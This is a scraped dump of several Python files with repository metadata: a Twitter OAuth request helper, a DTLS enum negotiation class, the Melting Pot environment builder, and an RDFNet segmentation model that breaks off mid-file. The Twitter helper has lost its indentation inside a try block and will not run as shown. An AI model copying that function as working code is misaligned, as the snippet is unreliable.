] | 1 | 2020-05-14T22:33:31.000Z | 2020-05-14T22:33:31.000Z | '''
Built-in modules
'''
import pdb
import oauth2 as oauth
import os
import json
'''
User defined modules
'''
from libs.twitter_logging import logger
print("Using oauth")
# Global variables
# Twitter key/secret as a result of registering application
TWITTER_CONSUMER_KEY = os.environ["TWITTER_CONSUMER_KEY"]
TWITTER_CONSUMER_SECRET = os.environ["TWITTER_CONSUMER_SECRET"]
# Twitter token key/secret from individual user oauth
TWITTER_USER_KEY = os.environ["TWITTER_USER_KEY"]
TWITTER_USER_SECRET = os.environ["TWITTER_USER_SECRET"]
def make_api_request(url, method='GET', headers=None):
    headers = headers or {}  # avoid a mutable default argument
    try:
token = oauth.Token(key=TWITTER_USER_KEY, secret=TWITTER_USER_SECRET)
consumer = oauth.Consumer(key=TWITTER_CONSUMER_KEY, secret=TWITTER_CONSUMER_SECRET)
client = oauth.Client(consumer, token)
response, content = client.request(url, method, headers=headers)
return response, json.loads(content)
except Exception as e:
logger.error("Error {} while {} API with {} method".format(e, url, method))
raise
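# Example (endpoint is illustrative):
#   resp, body = make_api_request('https://api.twitter.com/1.1/account/verify_credentials.json')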
| 29.857143 | 89 | 0.751196 | 141 | 1,045 | 5.375887 | 0.382979 | 0.118734 | 0.084433 | 0.050132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001121 | 0.146411 | 1,045 | 34 | 90 | 30.735294 | 0.848655 | 0.137799 | 0 | 0 | 0 | 0 | 0.14832 | 0.026651 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.25 | 0 | 0.35 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b707985d6d3837a66930e043d098597e8582439 | 1,500 | py | Python | src/aio_dtls/connection_manager/enum_props.py | businka/aio_dtls | 0dba40d425b443e5ceb516011aadf58f573a4dc8 | [
"MIT"
] | null | null | null | src/aio_dtls/connection_manager/enum_props.py | businka/aio_dtls | 0dba40d425b443e5ceb516011aadf58f573a4dc8 | [
"MIT"
] | null | null | null | src/aio_dtls/connection_manager/enum_props.py | businka/aio_dtls | 0dba40d425b443e5ceb516011aadf58f573a4dc8 | [
"MIT"
] | null | null | null | import logging
from enum import Enum
from typing import List, Tuple
logger = logging.getLogger(__name__)
class Default(Enum):
pass
class EnumProps:
supported = []
EnumClass = Default
def __init__(self, wish_list=None):
self._available: List[Tuple[str, int]] = self._init_from_list(wish_list)
pass
@property
def available(self):
return [item[1] for item in self._available]
@property
def default(self):
return self.EnumClass[self.supported[0]]
@property
def available_values(self):
return [hash(item[1]) for item in self._available]
def _init_from_list(self, wish_list):
_result = []
if wish_list is None:
wish_list = self.supported
for elem in wish_list:
try:
prop = self.EnumClass[elem]
_result.append((prop.name, prop.value))
except KeyError:
logger.warning(f'{self.__class__.__name__} not supported {elem}')
_result = sorted(_result, key=lambda x: hash(x[1]), reverse=True)
return _result
def get_best(self, client_offer: list):
_client_offer = [str(item) for item in client_offer]
logger.debug(f'{self.__class__.__name__} selecting from {_client_offer}')
for elem in self._available:
if elem[0] in client_offer:
logger.debug(f'{self.__class__.__name__} selected {elem[0]}')
return self.EnumClass[elem[0]]
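# --- Illustrative sketch (hypothetical enum, not part of the library) ---
class _DemoColor(Enum):
    RED = 1
    BLUE = 2

class _DemoColors(EnumProps):
    EnumClass = _DemoColor
    supported = ['RED', 'BLUE']

# _DemoColors().get_best(['BLUE']) -> _DemoColor.BLUE: the server's ordered
# preferences are intersected with the client's offer, mirroring how cipher
# suites are negotiated.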
| 28.846154 | 81 | 0.623333 | 187 | 1,500 | 4.668449 | 0.315508 | 0.054983 | 0.030928 | 0.04811 | 0.148912 | 0.148912 | 0.148912 | 0.087056 | 0.087056 | 0 | 0 | 0.006446 | 0.276 | 1,500 | 51 | 82 | 29.411765 | 0.797422 | 0 | 0 | 0.125 | 0 | 0 | 0.097333 | 0.05 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0.05 | 0.075 | 0.075 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7145fb178bd8bd0a1a4f13cb1dc9f132d5a8d6 | 7,585 | py | Python | meltingpot/python/utils/substrates/builder.py | LaudateCorpus1/meltingpot | e42b916b32771f7af5ad4eccbdf4ded410735299 | [
"Apache-2.0"
] | 132 | 2021-07-16T14:15:07.000Z | 2022-03-31T21:29:19.000Z | meltingpot/python/utils/substrates/builder.py | vishalbelsare/meltingpot | f36ed3aab6414acee0720721b053322bf41a75d4 | [
"Apache-2.0"
] | 21 | 2021-07-22T17:37:22.000Z | 2022-03-16T02:59:37.000Z | meltingpot/python/utils/substrates/builder.py | LaudateCorpus1/meltingpot | e42b916b32771f7af5ad4eccbdf4ded410735299 | [
"Apache-2.0"
] | 19 | 2021-07-17T17:15:05.000Z | 2022-03-22T17:28:54.000Z | # Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multi-player environment builder for Melting Pot levels."""
import copy
import itertools
import os
import pathlib # pylint: disable=unused-import
import random
from typing import Any, Dict, Optional, Union
from absl import logging
from ml_collections import config_dict
import tree
import dmlab2d
from dmlab2d import runfiles_helper
from dmlab2d import settings_helper
from meltingpot.python.utils.substrates import game_object_utils
from meltingpot.python.utils.substrates.wrappers import reset_wrapper
Settings = Union[config_dict.ConfigDict, Dict[str, Any]]
Prefabs = Dict[str, Settings]
_MAX_SEED = 2 ** 32 - 1
_DMLAB2D_ROOT = runfiles_helper.find()
_MELTINGPOT_ROOT = str(pathlib.Path(__file__).parent.parent.parent.parent.parent)
# Although to_dict in ConfigDict is recursive, it is not enough for our use case
# because the recursion will _not_ go into the list elements. And we have plenty
# of those in our configs.
def _config_dict_to_dict(value):
if isinstance(value, config_dict.ConfigDict):
return tree.map_structure(_config_dict_to_dict, value.to_dict())
return value
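# Example of the case the recursion handles: a ConfigDict holding a *list* of
# ConfigDicts (common for gameObjects/prefabs configs). A plain .to_dict() would
# leave each list element as a ConfigDict; tree.map_structure descends into the
# list and converts those elements too.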
def parse_python_settings_for_dmlab2d(
lab2d_settings: config_dict.ConfigDict) -> Settings:
"""Flatten lab2d_settings into Lua-friendly properties."""
# Since config_dicts disallow "." in keys, we must use a different character,
# "$", in our config and then convert it to "." here. This is particularly
# important for levels with config keys like 'player.%default' in DMLab2D.
lab2d_settings = _config_dict_to_dict(lab2d_settings)
lab2d_settings = settings_helper.flatten_args(lab2d_settings)
lab2d_settings_dict = {}
for key, value in lab2d_settings.items():
converted_key = key.replace("$", ".")
lab2d_settings_dict[converted_key] = str(value)
return lab2d_settings_dict
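# Example (hypothetical key): a config entry {'player$%default': 5} is flattened
# and converted here to {'player.%default': '5'}, i.e. the dotted keys and
# string values expected on the Lua side.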
def apply_prefab_overrides(
lab2d_settings: config_dict.ConfigDict,
prefab_overrides: Optional[Settings] = None):
"""Apply prefab overrides to lab2d_settings."""
if "gameObjects" not in lab2d_settings.simulation:
lab2d_settings.simulation.gameObjects = []
# Edit prefabs with the overrides, both in lab2d_settings and in prefabs.
if prefab_overrides:
for prefab, override in prefab_overrides.items():
for component, arg_overrides in override.items():
for arg_name, arg_override in arg_overrides.items():
if prefab not in lab2d_settings.simulation.prefabs:
raise ValueError(f"Prefab override for '{prefab}' given, but not " +
"available in `prefabs`.")
game_object_utils.get_first_named_component(
lab2d_settings.simulation.prefabs[prefab],
component)["kwargs"][arg_name] = arg_override
def maybe_build_and_add_avatar_objects(lab2d_settings: config_dict.ConfigDict):
"""If requested, build the avatar objects and add them to lab2d_settings.
Avatars will be built here if and only if:
1) An 'avatar' prefab is supplied in lab2d_settings.simulation.prefabs; and
2) lab2d_settings.simulation.buildAvatars is not True.
Avatars built here will have their colors set from the palette provided in
lab2d_settings.simulation.playerPalettes, or if none is provided, using the
first num_players colors in the colors.py module.
Args:
lab2d_settings: A writable version of the lab2d_settings. Avatar objects,
if they are to be built here, will be added as game objects in
lab2d_settings.simulation.gameObjects.
"""
# Whether the avatars will be built in Lua (False) or here (True). This is
# roughly the opposite of the `buildAvatars` setting.
build_avatars_here = ("avatar" in lab2d_settings.simulation.prefabs)
if ("buildAvatars" in lab2d_settings.simulation
and lab2d_settings.simulation.buildAvatars):
build_avatars_here = False
if "avatar" not in lab2d_settings.simulation.prefabs:
raise ValueError(
"Deferring avatar building to Lua, yet no 'avatar' prefab given.")
if build_avatars_here:
palettes = (lab2d_settings.simulation.playerPalettes
if "playerPalettes" in lab2d_settings.simulation else None)
if "gameObjects" not in lab2d_settings.simulation:
lab2d_settings.simulation.gameObjects = []
# Create avatars.
logging.info("Building avatars in `meltingpot.builder` with palettes: %s",
lab2d_settings.simulation.playerPalettes)
avatar_objects = game_object_utils.build_avatar_objects(
int(lab2d_settings.numPlayers),
lab2d_settings.simulation.prefabs,
palettes)
lab2d_settings.simulation.gameObjects += avatar_objects
def locate_and_overwrite_level_directory(
lab2d_settings: config_dict.ConfigDict):
"""Locates the run files, and overwrites the levelDirectory with it."""
# Locate runfiles.
level_name = lab2d_settings.get("levelName")
level_dir = lab2d_settings.get("levelDirectory")
if level_dir:
lab2d_settings.levelName = os.path.join(level_dir, level_name)
lab2d_settings.levelDirectory = _MELTINGPOT_ROOT
def builder(
lab2d_settings: Settings,
prefab_overrides: Optional[Settings] = None,
env_seed: Optional[int] = None,
**settings) -> dmlab2d.Environment:
"""Builds a Melting Pot environment.
Args:
lab2d_settings: a dict of environment designation args.
prefab_overrides: overrides for prefabs.
env_seed: the seed to pass to the environment.
**settings: Other settings which are not used by Melting Pot but can still
be passed from the environment builder.
Returns:
A multi-player Melting Pot environment.
"""
del settings # Not currently used by DMLab2D.
assert "simulation" in lab2d_settings
# Copy config, so as not to modify it.
lab2d_settings = config_dict.ConfigDict(
copy.deepcopy(lab2d_settings)).unlock()
apply_prefab_overrides(lab2d_settings, prefab_overrides)
maybe_build_and_add_avatar_objects(lab2d_settings)
locate_and_overwrite_level_directory(lab2d_settings)
# Convert settings from python to Lua format.
lab2d_settings_dict = parse_python_settings_for_dmlab2d(lab2d_settings)
# Only the raw environment has the properties API.
env_raw = dmlab2d.Lab2d(_DMLAB2D_ROOT, lab2d_settings_dict)
observation_names = env_raw.observation_names()
logging.info("available observation names: %s", observation_names)
if env_seed is None:
# Select a long seed different than zero.
env_seed = random.randint(1, _MAX_SEED)
env_seeds = (seed % (_MAX_SEED + 1) for seed in itertools.count(env_seed))
def build_environment():
seed = next(env_seeds)
lab2d_settings_dict["env_seed"] = str(seed) # Sets the Lua seed.
env_raw = dmlab2d.Lab2d(runfiles_helper.find(), lab2d_settings_dict)
return dmlab2d.Environment(
env=env_raw,
observation_names=observation_names,
seed=seed)
# Add a wrapper that rebuilds the environment when reset is called.
env = reset_wrapper.ResetWrapper(build_environment)
return env
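# A minimal usage sketch (the settings below are illustrative, not a real
# substrate config; actual lab2d_settings come from Melting Pot's configs):
#
#   settings = config_dict.ConfigDict({
#       "levelName": "example_level",
#       "numPlayers": 2,
#       "simulation": {"prefabs": {}, "gameObjects": []},
#   })
#   env = builder(settings, env_seed=42)
#   timestep = env.reset()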
| 39.505208 | 81 | 0.753724 | 1,021 | 7,585 | 5.400588 | 0.27522 | 0.12967 | 0.079253 | 0.045339 | 0.174646 | 0.092129 | 0.092129 | 0.060573 | 0.027203 | 0.027203 | 0 | 0.013694 | 0.17205 | 7,585 | 191 | 82 | 39.712042 | 0.864331 | 0.361767 | 0 | 0.038835 | 0 | 0 | 0.069664 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 1 | 0.067961 | false | 0 | 0.135922 | 0 | 0.252427 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b74a70df1f3528c0e00a84d2d1ae7d6f95e52e3 | 20,333 | py | Python | models/resnet.py | egvincent/rgbd-sem-seg | 054890ace318a883aac0ad1bfa3d2383939a6892 | [
"BSD-2-Clause"
] | 1 | 2021-07-08T12:01:18.000Z | 2021-07-08T12:01:18.000Z | models/resnet.py | egvincent/rgbd-sem-seg | 054890ace318a883aac0ad1bfa3d2383939a6892 | [
"BSD-2-Clause"
] | 5 | 2021-03-19T00:34:34.000Z | 2022-03-11T23:47:16.000Z | models/resnet.py | egvincent/rgbd-sem-seg | 054890ace318a883aac0ad1bfa3d2383939a6892 | [
"BSD-2-Clause"
] | 1 | 2021-07-08T12:01:20.000Z | 2021-07-08T12:01:20.000Z | """RefineNet-LightWeight
RefineNet-LigthWeight PyTorch for non-commercial purposes
Copyright (c) 2018, Vladimir Nekrasov (vladimir.nekrasov@adelaide.edu.au)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import torch.nn as nn
import torch.nn.functional as F
import torch
import numpy as np
from utils.helpers import maybe_download
from utils.layer_factory import conv1x1, conv3x3, CRPBlock
data_info = {
7 : 'Person',
21: 'VOC',
40: 'NYU',
60: 'Context'
}
models_urls = {
'50_person' : 'https://cloudstor.aarnet.edu.au/plus/s/mLA7NxVSPjNL7Oo/download',
'101_person' : 'https://cloudstor.aarnet.edu.au/plus/s/f1tGGpwdCnYS3xu/download',
'152_person' : 'https://cloudstor.aarnet.edu.au/plus/s/Ql64rWqiTvWGAA0/download',
'50_voc' : 'https://cloudstor.aarnet.edu.au/plus/s/2E1KrdF2Rfc5khB/download',
'101_voc' : 'https://cloudstor.aarnet.edu.au/plus/s/CPRKWiaCIDRdOwF/download',
'152_voc' : 'https://cloudstor.aarnet.edu.au/plus/s/2w8bFOd45JtPqbD/download',
'50_nyu' : 'https://cloudstor.aarnet.edu.au/plus/s/gE8dnQmHr9svpfu/download',
'101_nyu' : 'https://cloudstor.aarnet.edu.au/plus/s/VnsaSUHNZkuIqeB/download',
'152_nyu' : 'https://cloudstor.aarnet.edu.au/plus/s/EkPQzB2KtrrDnKf/download',
'101_context': 'https://cloudstor.aarnet.edu.au/plus/s/hqmplxWOBbOYYjN/download',
'152_context': 'https://cloudstor.aarnet.edu.au/plus/s/O84NszlYlsu00fW/download',
'50_imagenet' : 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'101_imagenet': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'152_imagenet': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
stages_suffixes = {0 : '_conv',
1 : '_conv_relu_varout_dimred'}
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
### This class was made to abstract the RefineNet code from the original
### ResNet (originally ResNetLW) module into its own module. Further, I have
### made the following modifications to convert from LW-RefineNet to RefineNet:
### - conv1x1 changed to conv3x3 in all lines ending in _varout_dimred,
### which are part of the multi-resolution fusion blocks
### - RCU blocks added
### - heavy reorganization, renaming, etc
### I would like to rename the blocks in this module, but the names are
### referenced elsewhere (e.g. by pretrained state dicts), so they stay as-is
class RefineNet(nn.Module):
# inplanes_hr/lr are the number of channels of the high resolution input and
# low resolution input respectively. if inplanes_hr is omitted, no fusion takes
# place: this is useful for layer 4 in our case, to prep for fusing it with layer 3.
# the inputs will be passed through:
# - if HR is provided: 2 RCU blocks for HR only
# otherwise, 2 RCU blocks for LR only
# - fusion of HR and LR (if HR is provided)
# - CRP block + 1 RCU block for result of fusion (or LR if no HR provided)
def __init__(self, inplanes_lr, inplanes_hr=None, fancy_upsample=False):
super(RefineNet, self).__init__()
self.fancy_upsample = fancy_upsample
# first set of RCU blocks
if inplanes_hr is None:
self.inplanes = inplanes_lr
self.rcu1_lr = self._make_layer(BasicBlock, planes=inplanes_lr, blocks=2)
else:
self.inplanes = inplanes_hr
self.rcu1_hr = self._make_layer(BasicBlock, planes=inplanes_hr, blocks=2)
# fusion
if inplanes_hr is not None:
self.adapt_stage2_b2_joint_varout_dimred = conv3x3(inplanes_hr, inplanes_hr, bias=False)
self.mflow_conv_g1_b3_joint_varout_dimred = conv3x3(inplanes_lr, inplanes_hr, bias=False)
if fancy_upsample:
# learnable upsample with a single (strided) transpose convolution (for now)
self.upsample = nn.ConvTranspose2d(inplanes_hr, inplanes_hr, kernel_size=3, stride=2, padding=1)
#self.upsample = nn.ConvTranspose2d(inplanes_hr, inplanes_hr, kernel_size=5, stride=2, padding=2)
# CRP and RCU for fusion result
outplanes = inplanes_hr if inplanes_hr is not None else inplanes_lr
self.mflow_conv_g1_pool = self._make_crp(outplanes, outplanes, 4)
self.inplanes = outplanes
self.rcu2 = self._make_layer(BasicBlock, planes=outplanes, blocks=1)
# _make_layer and _make_crp copied from the ResNetLW class
def _make_crp(self, in_planes, out_planes, stages):
layers = [CRPBlock(in_planes, out_planes, stages)]
return nn.Sequential(*layers)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x_lr, x_hr=None):
# first set of RCU blocks
if x_hr is None:
x_lr = self.rcu1_lr(x_lr)
else:
x_hr = self.rcu1_hr(x_hr)
# fusion (or not)
x = x_lr
if x_hr is not None:
x_lr = self.mflow_conv_g1_b3_joint_varout_dimred(x_lr)
if self.fancy_upsample:
x_lr = self.upsample(x_lr, output_size=x_hr.size()) # might have to do [2:]
else:
x_lr = nn.Upsample(size=x_hr.size()[2:], mode='bilinear', align_corners=True)(x_lr)
x_hr = self.adapt_stage2_b2_joint_varout_dimred(x_hr)
x = x_lr + x_hr
x = F.relu(x)
# CRP and RCU for fusion result
x = self.mflow_conv_g1_pool(x) # CRP
x = self.rcu2(x)
out = x
return out
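# A minimal shape sketch (channel counts and spatial sizes are illustrative):
#
#   refine = RefineNet(inplanes_lr=512, inplanes_hr=256)
#   x_lr = torch.randn(1, 512, 8, 8)     # low-resolution features
#   x_hr = torch.randn(1, 256, 16, 16)   # high-resolution features
#   out = refine(x_lr, x_hr)             # fused output: (1, 256, 16, 16)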
### added for RDFNet implementation
class MMFNet(nn.Module):
# in_channels will be 512 for MMFNet-4 and 256 for others, as per RDFNet paper
def __init__(self, in_channels):
super(MMFNet, self).__init__()
self.do = nn.Dropout(p=0.5)
# these next blocks are the same for both RGB and HHA because
# the input volumes are exactly the same dimensions (including # channels)
# conv3 is also used for the convolution before and after fusion
# pre-fusion RGB blocks
self.conv1_rgb = conv1x1(in_planes=in_channels, out_planes=in_channels)
self.RCUs_rgb = nn.Sequential( # 2 RCU blocks
BasicBlock(inplanes=in_channels, planes=in_channels), # expansion=1, no downsampling
BasicBlock(inplanes=in_channels, planes=in_channels) # expansion=1, no downsampling
)
self.conv3_rgb = conv3x3(in_planes=in_channels, out_planes=in_channels)
# pre-fusion HHA blocks
self.conv1_hha = conv1x1(in_planes=in_channels, out_planes=in_channels)
self.RCUs_hha = nn.Sequential( # 2 RCU blocks
BasicBlock(inplanes=in_channels, planes=in_channels), # expansion=1, no downsampling
BasicBlock(inplanes=in_channels, planes=in_channels) # expansion=1, no downsampling
)
self.conv3_hha = conv3x3(in_planes=in_channels, out_planes=in_channels)
# post-fusion block
#self.maxpool = nn.MaxPool2d(kernel_size=5, stride=1)
#self.conv3 = conv3x3(in_planes=in_channels, out_planes=in_channels)
self.crp = CRPBlock(in_planes=in_channels, out_planes=in_channels, n_stages=1)
def forward(self, x_rgb, x_depth):
# pre-fusion RGB
x_rgb = self.do(x_rgb)
x_rgb = self.conv1_rgb(x_rgb)
x_rgb = self.RCUs_rgb(x_rgb)
x_rgb = self.conv3_rgb(x_rgb)
# pre-fusion HHA
x_depth = self.do(x_depth)
x_depth = self.conv1_hha(x_depth)
x_depth = self.RCUs_hha(x_depth)
x_depth = self.conv3_hha(x_depth)
# fusion
x = x_rgb + x_depth
# post-fusion
x = F.relu(x)
#residual = x
#x = self.maxpool(x)
#x = self.conv3(x)
#out = x + residual
out = self.crp(x)
return out
### This module now represents the RDFNet
###
### changes and additions to the original version of this class:
### - reorganization and commenting for clarity
### - RefineNet component isolated into its own RefineNet module: see above
### - to convert from RefineNet to RDFNet:
### - depth track added (all blocks ending in "_depth")
### - MMFNet added to fuse RGB and depth tracks
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=40):  # default changed from 21 (VOC) to 40 (NYU)
super(ResNet, self).__init__()
self.do = nn.Dropout(p=0.5)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.conv1_depth = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.bn1_depth = nn.BatchNorm2d(64)
#self.relu = nn.ReLU(inplace=True) -- switched to F.relu to avoid errors
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
# backbone
self.inplanes = 64
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.inplanes = 64
self.layer1_depth = self._make_layer(block, 64, layers[0])
self.layer2_depth = self._make_layer(block, 128, layers[1], stride=2)
self.layer3_depth = self._make_layer(block, 256, layers[2], stride=2)
self.layer4_depth = self._make_layer(block, 512, layers[3], stride=2)
# dimensionality reduction right off the backbone
# note the inverted naming: x4 uses the outl1 block, x3 uses outl2, etc.
# I would like to rename these as well, but pretrained state dicts reference
# these names, so they are kept
self.p_ims1d2_outl1_dimred = conv1x1(2048, 512, bias=False) # really l4
self.p_ims1d2_outl2_dimred = conv1x1(1024, 256, bias=False) # really l3
self.p_ims1d2_outl3_dimred = conv1x1(512, 256, bias=False) # really l2
self.p_ims1d2_outl4_dimred = conv1x1(256, 256, bias=False) # really l1
self.p_ims1d2_outl1_dimred_depth = conv1x1(2048, 512, bias=False) # really l4
self.p_ims1d2_outl2_dimred_depth = conv1x1(1024, 256, bias=False) # really l3
self.p_ims1d2_outl3_dimred_depth = conv1x1(512, 256, bias=False) # really l2
self.p_ims1d2_outl4_dimred_depth = conv1x1(256, 256, bias=False) # really l1
# MMFNets
self.MMFNet_l4 = MMFNet(in_channels=512)
self.MMFNet_l3 = MMFNet(in_channels=256)
self.MMFNet_l2 = MMFNet(in_channels=256)
self.MMFNet_l1 = MMFNet(in_channels=256)
# RefineNets
self.RefineNet_l4 = RefineNet(inplanes_lr=512) # no fusion step
self.RefineNet_l4_l3 = RefineNet(inplanes_lr=512, inplanes_hr=256, fancy_upsample=True)
self.RefineNet_l3_l2 = RefineNet(inplanes_lr=256, inplanes_hr=256, fancy_upsample=True)
self.RefineNet_l2_l1 = RefineNet(inplanes_lr=256, inplanes_hr=256, fancy_upsample=True)
# CLF convolutional step applied to layer 1 output to get class predictions
self.clf_conv = nn.Conv2d(256, num_classes, kernel_size=3, stride=1,
padding=1, bias=True)
def _make_crp(self, in_planes, out_planes, stages):
layers = [CRPBlock(in_planes, out_planes, stages)]
return nn.Sequential(*layers)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x, x_depth):
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.maxpool(x)
x_depth = self.conv1_depth(x_depth)
x_depth = self.bn1_depth(x_depth)
x_depth = F.relu(x_depth)
x_depth = self.maxpool(x_depth)
# backbone
l1 = self.layer1(x)
l2 = self.layer2(l1)
l3 = self.layer3(l2)
l4 = self.layer4(l3)
# the depth track uses its own backbone layers
l1_depth = self.layer1_depth(x_depth)
l2_depth = self.layer2_depth(l1_depth)
l3_depth = self.layer3_depth(l2_depth)
l4_depth = self.layer4_depth(l3_depth)
# not sure why dropout is only applied to l3 and l4, but it's in the original
# code, so I mirrored the same thing for the depth track
l4 = self.do(l4)
l3 = self.do(l3)
l4_depth = self.do(l4_depth)
l3_depth = self.do(l3_depth)
# dimensionality reduction right off the backbone
x4 = F.relu(self.p_ims1d2_outl1_dimred(l4))
x3 = F.relu(self.p_ims1d2_outl2_dimred(l3))
x2 = F.relu(self.p_ims1d2_outl3_dimred(l2))
x1 = F.relu(self.p_ims1d2_outl4_dimred(l1))
x4_depth = F.relu(self.p_ims1d2_outl1_dimred_depth(l4_depth))
x3_depth = F.relu(self.p_ims1d2_outl2_dimred_depth(l3_depth))
x2_depth = F.relu(self.p_ims1d2_outl3_dimred_depth(l2_depth))
x1_depth = F.relu(self.p_ims1d2_outl4_dimred_depth(l1_depth))
# MMFNets
x4 = self.MMFNet_l4(x4, x4_depth)
x3 = self.MMFNet_l3(x3, x3_depth)
x2 = self.MMFNet_l2(x2, x2_depth)
x1 = self.MMFNet_l1(x1, x1_depth)
# RefineNets
x4 = self.RefineNet_l4(x4)
x3 = self.RefineNet_l4_l3(x4, x3)
x2 = self.RefineNet_l3_l2(x3, x2)
x1 = self.RefineNet_l2_l1(x2, x1)
# CLF convolutional step to x1 to get class predictions
out = self.clf_conv(x1)
return out
### new: use ImageNet pretrained weights for keys containing "_depth" as well
### might help marginally
def use_pretrained_depth_track(model_dict, pretrained_model_dict):
# copy_() mutates the parameter tensors in place; plain assignment into the
# dict returned by state_dict() would not update the model's weights
for key in model_dict:
if "_depth" in key:
pretrained_key = "".join(key.split("_depth"))
if pretrained_key in pretrained_model_dict:
with torch.no_grad():
model_dict[key].copy_(pretrained_model_dict[pretrained_key])
### the functions below have been modified to call use_pretrained_depth_track
def rf_lw50(num_classes, imagenet=False, pretrained=True, **kwargs):
